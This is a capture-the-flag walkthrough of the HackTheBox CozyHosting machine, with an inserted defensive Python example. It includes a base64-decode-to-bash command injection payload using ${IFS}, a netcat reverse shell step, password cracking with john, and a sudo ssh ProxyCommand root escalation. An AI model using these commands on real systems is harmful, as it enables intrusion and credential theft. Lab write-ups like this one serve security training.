CozyHosting | HTB Walkthrough


In this guide, we'll explore the process of tackling the CozyHosting Machine on HackTheBox.

Adding the Target

  1. Connect to Hack The Box using a VPN and make a note of the provided IP address.

  2. Log in as the root user on Kali Linux and add an entry for "cozyhosting.htb" to the /etc/hosts file.

Scanning

Begin by scanning the target to check which ports are open and which services are running.

sudo nmap -sC -sV -sS <ip address>

The scan reveals two open ports: 22 (ssh) and 80 (http). When visiting the webpage, only a login feature is available.

Enumeration

Utilize the 'dirsearch' tool to search for directories.

dirsearch -u http://cozyhosting.htb/

Gaining Admin Access to the Webpage

Investigate the suspicious paths under /actuator/*. Open /actuator/sessions to find session data that is exposed without authorization.

Manipulate the sessions via the login process using the browser's devtools, altering the cookie value to 'kanderson', granting access to the Admin web page.

Use Burp Suite to identify the SSH configuration data and a potential command injection vulnerability in the 'username' parameter.

;echo${IFS}"[ PAYLOAD ]"|base64${IFS}-d|bash;
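
Why the ${IFS} form of the payload above matters to a defender, as an added example that is not from the original walkthrough or from the target application: a filter that rejects only literal whitespace lets such a value through, while an allowlist plus argv-style execution does not. The check functions, the regular expression and the harmless sample string are assumptions constructed for illustration.

```python
import re
import subprocess

# Hypothetical allowlist for a Unix account name; not taken from the page.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")

# Constructed, harmless input with the same shape as the payload above:
# no literal whitespace, ${IFS} standing in for the spaces.
SAMPLE = "x;echo${IFS}INJECTED;"


def whitespace_blocklist(username: str) -> bool:
    """Assumed weak check: reject only literal whitespace."""
    return not any(ch.isspace() for ch in username)


def allowlist(username: str) -> bool:
    """Accept only strings that are entirely a plausible account name."""
    return USERNAME_RE.fullmatch(username) is not None


def run_via_shell(username: str) -> str:
    """Vulnerable pattern: the value is pasted into a shell command line."""
    out = subprocess.run(["sh", "-c", "echo user=" + username],
                         capture_output=True, text=True)
    return out.stdout


def run_via_argv(username: str) -> str:
    """Hardened pattern: validate, then pass the value as one argv element."""
    if not allowlist(username):
        raise ValueError("invalid username")
    out = subprocess.run(["echo", "user=" + username],
                         capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    print("blocklist accepts sample:", whitespace_blocklist(SAMPLE))
    print("allowlist accepts sample:", allowlist(SAMPLE))
    # The shell expands ${IFS} and treats ';' as a command separator.
    print("shell output lines:", run_via_shell(SAMPLE).splitlines())
    print("argv output:", run_via_argv("kanderson").strip())
```

The second line of shell output comes from the injected command, which is the signal that user input reached a shell parser.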

Employ Netcat to regain shell access, then discover a .jar file and download it.

Once the download is finished, extract the file, and you will find the Postgres username and password.

Stabilizing the Shell Connection

Ensure stability by importing the pty module and spawning a bash shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Use the stty command to set terminal line settings and export TERM to xterm for a more compatible terminal emulator.

Once successfully connecting to Postgres, let’s explore the contents of the database to see what it holds for us.

Subsequently, we discover a username and password within the database and proceed to initiate the cracking process.

After successfully cracking the password, we can now attempt to establish an SSH connection.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

User flag has been obtained!

Privilege Escalation

Check permissions using the sudo -l command, which shows that SSH can be executed with root privileges.

Use the GTFOBins payload to execute an SSH command, granting access to the root flag.

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Now, we can proceed to read the Root flag.